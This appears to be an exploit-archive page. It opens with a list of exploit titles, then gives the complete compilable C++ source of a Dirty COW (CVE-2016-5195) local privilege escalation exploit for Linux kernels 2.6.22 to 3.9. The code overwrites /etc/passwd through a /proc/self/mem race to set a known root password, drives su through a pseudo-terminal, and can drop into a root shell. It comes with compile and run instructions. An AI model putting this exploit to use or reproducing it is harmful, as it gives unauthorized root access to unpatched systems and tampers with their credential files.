a5cd225af0
7 new exploits Xitami Web Server 5.0a0 - Denial of Service Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd) WinPower 4.9.0.4 - Privilege Escalation Internet PhotoShow (page) - Remote File Inclusion Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion EQdkp 1.3.0 - (dbal.php) Remote File Inclusion EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion MercuryBoard 1.1.4 - (User-Agent) SQL Injection MercuryBoard 1.1.4 - 'User-Agent' SQL Injection EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup Web Slider 0.6 - (path) Remote File Inclusion Web Slider 0.6 - 'path' Parameter Remote File Inclusion Zomplog 3.8 - (mp3playlist.php speler) SQL Injection Zomplog 3.8 - 'mp3playlist.php' SQL Injection EQdkp 1.3.2 - (listmembers.php rank) SQL Injection EQdkp 1.3.2 - 'listmembers.php' SQL Injection CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection Zomplog 3.8.1 - upload_files.php Arbitrary File Upload Zomplog 3.8.1 - Arbitrary File Upload CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection Mega File Hosting Script 1.2 - (fid) SQL Injection Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload AJ HYIP ACME - 'topic_detail.php id' SQL Injection EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC) e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection AJ HYIP ACME - 'topic_detail.php' SQL Injection EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC) e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection CaLogic Calendars 1.2.2 - (langsel) SQL Injection CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection EMO Realty Manager - 'news.php ida' SQL Injection The Real Estate Script - 'dpage.php docID' SQL Injection Linkspile - 'link.php cat_id' SQL Injection Freelance Auction Script 1.0 - (browseproject.php) SQL Injection EMO Realty Manager - 'ida' Parameter SQL Injection The Real Estate Script - 'docID' Parameter SQL Injection Linkspile - 'cat_id' Parameter SQL Injection Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting Kostenloses Linkmanagementscript - Remote File Inclusion newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities 68 Classifieds 4.0 - (category.php cat) SQL Injection newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection 68 Classifieds 4.0 - 'category.php' SQL Injection StanWeb.CMS - (default.asp id) SQL Injection StanWeb.CMS - SQL Injection Archangel Weblog 0.90.02 - (post_id) SQL Injection Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection WR-Meeting 1.0 - (msnum) Local File Disclosure WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure FicHive 1.0 - (category) Blind SQL Injection Smeego 1.0 - (Cookie lang) Local File Inclusion FicHive 1.0 - 'category' Parameter Blind SQL Injection Smeego 1.0 - 'Cookie lang' Local File Inclusion TAGWORX.CMS - Multiple SQL Injections TAGWORX.CMS 3.00.02 - Multiple SQL Injections lulieblog 1.2 - Multiple Vulnerabilities AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin easycms 0.4.2 - Multiple Vulnerabilities Lulieblog 1.2 - Multiple Vulnerabilities AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin Easycms 0.4.2 - Multiple Vulnerabilities AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection EntertainmentScript - 'play.php id' SQL Injection EntertainmentScript 1.4.0 - 'play.php' SQL Injection ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities ComicShout 2.5 - (index.php comic_id) SQL Injection eCMS 0.4.2 - SQL Injection / Security Bypass Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery ComicShout 2.5 - 'comic_id' Parameter SQL Injection PHP Jokesite 2.0 - 'cat_id' SQL Injection Netious CMS 0.4 - (index.php pageid) SQL Injection PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection Netious CMS 0.4 - 'pageid' Parameter SQL Injection 6rbScript - 'news.php newsid' SQL Injection webl?sninger 4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities 6rbScript - 'news.php' SQL Injection Weblosninger 4 - Cross-Site Scripting / SQL Injection e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection Quate CMS 0.3.4 - Multiple Vulnerabilities RoomPHPlanning 1.5 - (idresa) SQL Injection PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion CMS MAXSITE 1.10 - (category) SQL Injection CMS MAXSITE 1.10 - 'category' Parameter SQL Injection CKGold Shopping Cart 2.5 - (category_id) SQL Injection CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection ComicShout 2.8 - (news.php news_id) SQL Injection ComicShout 2.8 - 'news_id' Parameter SQL Injection AJ HYIP ACME - 'news.php id' SQL Injection AJ HYIP ACME - 'news.php' SQL Injection Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection AJ HYIP ACME - 'comment.php artid' SQL Injection AJ HYIP ACME - 'readarticle.php artid' SQL Injection AJ HYIP ACME - 'comment.php' SQL Injection AJ HYIP ACME - 'readarticle.php' SQL Injection 6rbScript 3.3 - 'singerid' SQL Injection 6rbScript 3.3 - 'singerid' Parameter SQL Injection 6rbScript 3.3 - (section.php name) Local File Inclusion 6rbScript 3.3 - 'section.php' Local File Inclusion RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit RoomPHPlanning 1.6 - 'userform.php' Create Admin User Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion Quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery YABSoft Advanced Image Hosting Script - SQL Injection Advanced Image Hosting Script - SQL Injection MercuryBoard 1.1 - index.php SQL Injection MercuryBoard 1.1 - 'index.php' SQL Injection CMS Made Simple 0.10 - Lang.php Remote File Inclusion CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion Zomplog 3.3/3.4 - detail.php HTML Injection Zomplog 3.3/3.4 - 'detail.php' HTML Injection CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting EQDKP 1.3.1 - Show Variable Cross-Site Scripting EQdkp 1.3.1 - Cross-Site Scripting CMS Made Simple 105 - Stylesheet.php SQL Injection CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection Internet PhotoShow - 'login_admin' Parameter Unauthorized Access 68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'login.php' Cross-Site Scripting 68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'category.php' Cross-Site Scripting 68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting 68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting 68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting 68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting 68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting 68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting 68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities Zomplog 3.9 - 'message' Parameter Cross-Site Scripting YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion Joomla! Component Catalog 1.0.7 - SQL Injection Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection Xfinity Gateway - Cross-Site Request Forgery
261 lines
No EOL
10 KiB
C++
Executable file
261 lines
No EOL
10 KiB
C++
Executable file
// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
|
|
// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
|
|
//
|
|
// -----------------------------------------------------------------
|
|
// Copyright (C) 2016 Gabriele Bonacini
|
|
//
|
|
// This program is free software; you can redistribute it and/or modify
|
|
// it under the terms of the GNU General Public License as published by
|
|
// the Free Software Foundation; either version 3 of the License, or
|
|
// (at your option) any later version.
|
|
// This program is distributed in the hope that it will be useful,
|
|
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
// GNU General Public License for more details.
|
|
// You should have received a copy of the GNU General Public License
|
|
// along with this program; if not, write to the Free Software Foundation,
|
|
// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
|
// -----------------------------------------------------------------
|
|
|
|
#include <iostream>
|
|
#include <fstream>
|
|
#include <string>
|
|
#include <thread>
|
|
#include <sys/mman.h>
|
|
#include <fcntl.h>
|
|
#include <unistd.h>
|
|
#include <sys/types.h>
|
|
#include <pwd.h>
|
|
#include <pty.h>
|
|
#include <string.h>
|
|
#include <termios.h>
|
|
#include <sys/wait.h>
|
|
#include <signal.h>
|
|
|
|
#define BUFFSIZE 1024
|
|
#define PWDFILE "/etc/passwd"
|
|
#define BAKFILE "./.ssh_bak"
|
|
#define TMPBAKFILE "/tmp/.ssh_bak"
|
|
#define PSM "/proc/self/mem"
|
|
#define ROOTID "root:"
|
|
#define SSHDID "sshd:"
|
|
#define MAXITER 300
|
|
#define DEFPWD "$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/"
|
|
#define TXTPWD "dirtyCowFun\n"
|
|
#define DISABLEWB "echo 0 > /proc/sys/vm/dirty_writeback_centisecs\n"
|
|
#define EXITCMD "exit\n"
|
|
#define CPCMD "cp "
|
|
#define RMCMD "rm "
|
|
|
|
using namespace std;
|
|
|
|
class Dcow{
|
|
private:
|
|
bool run, rawMode, opShell, restPwd;
|
|
void *map;
|
|
int fd, iter, master, wstat;
|
|
string buffer, etcPwd, etcPwdBak,
|
|
root, user, pwd, sshd;
|
|
thread *writerThr, *madviseThr, *checkerThr;
|
|
ifstream *extPwd;
|
|
ofstream *extPwdBak;
|
|
struct passwd *userId;
|
|
pid_t child;
|
|
char buffv[BUFFSIZE];
|
|
fd_set rfds;
|
|
struct termios termOld, termNew;
|
|
ssize_t ign;
|
|
|
|
void exitOnError(string msg);
|
|
public:
|
|
Dcow(bool opSh, bool rstPwd);
|
|
~Dcow(void);
|
|
int expl(void);
|
|
};
|
|
|
|
Dcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),
|
|
iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),
|
|
madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr),
|
|
child(0){
|
|
userId = getpwuid(getuid());
|
|
user.append(userId->pw_name).append(":");
|
|
extPwd = new ifstream(PWDFILE);
|
|
while (getline(*extPwd, buffer)){
|
|
buffer.append("\n");
|
|
etcPwdBak.append(buffer);
|
|
if(buffer.find(root) == 0){
|
|
etcPwd.insert(0, root).insert(root.size(), pwd);
|
|
etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(),
|
|
buffer.begin() + buffer.find(":", root.size()), buffer.end());
|
|
}else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){
|
|
etcPwd.insert(0, buffer);
|
|
}else{
|
|
etcPwd.append(buffer);
|
|
}
|
|
}
|
|
extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);
|
|
extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());
|
|
extPwdBak->close();
|
|
fd = open(PWDFILE,O_RDONLY);
|
|
map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);
|
|
}
|
|
|
|
Dcow::~Dcow(void){
|
|
extPwd->close();
|
|
close(fd);
|
|
delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;
|
|
if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);
|
|
if(child != 0) wait(&wstat);
|
|
}
|
|
|
|
void Dcow::exitOnError(string msg){
|
|
cerr << msg << endl;
|
|
// if(child != 0) kill(child, SIGKILL);
|
|
throw new exception();
|
|
}
|
|
|
|
int Dcow::expl(void){
|
|
madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });
|
|
writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR);
|
|
while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET);
|
|
ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }
|
|
});
|
|
checkerThr = new thread([&](){ while(iter <= MAXITER){
|
|
extPwd->clear(); extPwd->seekg(0, ios::beg);
|
|
buffer.assign(istreambuf_iterator<char>(*extPwd),
|
|
istreambuf_iterator<char>());
|
|
if(buffer.find(pwd) != string::npos &&
|
|
buffer.size() >= etcPwdBak.size()){
|
|
run = false; break;
|
|
}
|
|
iter ++; usleep(300000);
|
|
}
|
|
run = false;
|
|
});
|
|
|
|
cerr << "Running ..." << endl;
|
|
madviseThr->join();
|
|
writerThr->join();
|
|
checkerThr->join();
|
|
|
|
if(iter <= MAXITER){
|
|
child = forkpty(&master, nullptr, nullptr, nullptr);
|
|
|
|
if(child == -1) exitOnError("Error forking pty.");
|
|
|
|
if(child == 0){
|
|
execlp("su", "su", "-", nullptr);
|
|
exitOnError("Error on exec.");
|
|
}
|
|
|
|
if(opShell) cerr << "Password overridden to: " << TXTPWD << endl;
|
|
memset(buffv, 0, BUFFSIZE);
|
|
ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);
|
|
if(bytes_read <= 0) exitOnError("Error reading su prompt.");
|
|
cerr << "Received su prompt (" << buffv << ")" << endl;
|
|
|
|
if(write(master, TXTPWD, strlen(TXTPWD)) <= 0)
|
|
exitOnError("Error writing pwd on tty.");
|
|
|
|
if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0)
|
|
exitOnError("Error writing cmd on tty.");
|
|
|
|
if(!opShell){
|
|
if(write(master, EXITCMD, strlen(EXITCMD)) <= 0)
|
|
exitOnError("Error writing exit cmd on tty.");
|
|
}else{
|
|
if(restPwd){
|
|
string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(" ").append(PWDFILE).append("\n");
|
|
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
|
|
exitOnError("Error writing restore cmd on tty.");
|
|
restoreCmd = string(RMCMD).append(TMPBAKFILE).append("\n");
|
|
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
|
|
exitOnError("Error writing restore cmd (rm) on tty.");
|
|
}
|
|
|
|
if(tcgetattr(STDIN_FILENO, &termOld) == -1 )
|
|
exitOnError("Error getting terminal attributes.");
|
|
|
|
termNew = termOld;
|
|
termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));
|
|
|
|
if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)
|
|
exitOnError("Error setting terminal in non-canonical mode.");
|
|
rawMode = true;
|
|
|
|
while(true){
|
|
FD_ZERO(&rfds);
|
|
FD_SET(master, &rfds);
|
|
FD_SET(STDIN_FILENO, &rfds);
|
|
|
|
if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )
|
|
exitOnError("Error on select tty.");
|
|
|
|
if(FD_ISSET(master, &rfds)) {
|
|
memset(buffv, 0, BUFFSIZE);
|
|
bytes_read = read(master, buffv, BUFFSIZE - 1);
|
|
if(bytes_read <= 0) break;
|
|
if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)
|
|
exitOnError("Error writing on stdout.");
|
|
}
|
|
|
|
if(FD_ISSET(STDIN_FILENO, &rfds)) {
|
|
memset(buffv, 0, BUFFSIZE);
|
|
bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);
|
|
if(bytes_read <= 0) exitOnError("Error reading from stdin.");
|
|
if(write(master, buffv, bytes_read) != bytes_read) break;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
return [](int ret, bool shell){
|
|
string msg = shell ? "Exit.\n" : string("Root password is: ") + TXTPWD + "Enjoy! :-)\n";
|
|
if(ret <= MAXITER){cerr << msg; return 0;}
|
|
else{cerr << "Exploit failed.\n"; return 1;}
|
|
}(iter, opShell);
|
|
}
|
|
|
|
void printInfo(char* cmd){
|
|
cerr << cmd << " [-s] [-n] | [-h]\n" << endl;
|
|
cerr << " -s open directly a shell, if the exploit is successful;" << endl;
|
|
cerr << " -n combined with -s, doesn't restore the passwd file." << endl;
|
|
cerr << " -h print this synopsis;" << endl;
|
|
cerr << "\n If no param is specified, the program modifies the passwd file and exits." << endl;
|
|
cerr << " A copy of the passwd file will be create in the current directory as .ssh_bak" << endl;
|
|
cerr << " (unprivileged user), if no parameter or -n is specified.\n" << endl;
|
|
exit(1);
|
|
}
|
|
|
|
int main(int argc, char** argv){
|
|
const char flags[] = "shn";
|
|
int c;
|
|
bool opShell = false,
|
|
restPwd = true;
|
|
|
|
opterr = 0;
|
|
while ((c = getopt(argc, argv, flags)) != -1){
|
|
switch (c){
|
|
case 's':
|
|
opShell = true;
|
|
break;
|
|
case 'n':
|
|
restPwd = false;
|
|
break;
|
|
case 'h':
|
|
printInfo(argv[0]);
|
|
break;
|
|
default:
|
|
cerr << "Invalid parameter." << endl << endl;
|
|
printInfo(argv[0]);
|
|
}
|
|
}
|
|
|
|
if(!restPwd && !opShell){
|
|
cerr << "Invalid parameter: -n requires -s" << endl << endl;
|
|
printInfo(argv[0]);
|
|
}
|
|
|
|
Dcow dcow(opShell, restPwd);
|
|
return dcow.expl();
|
|
} |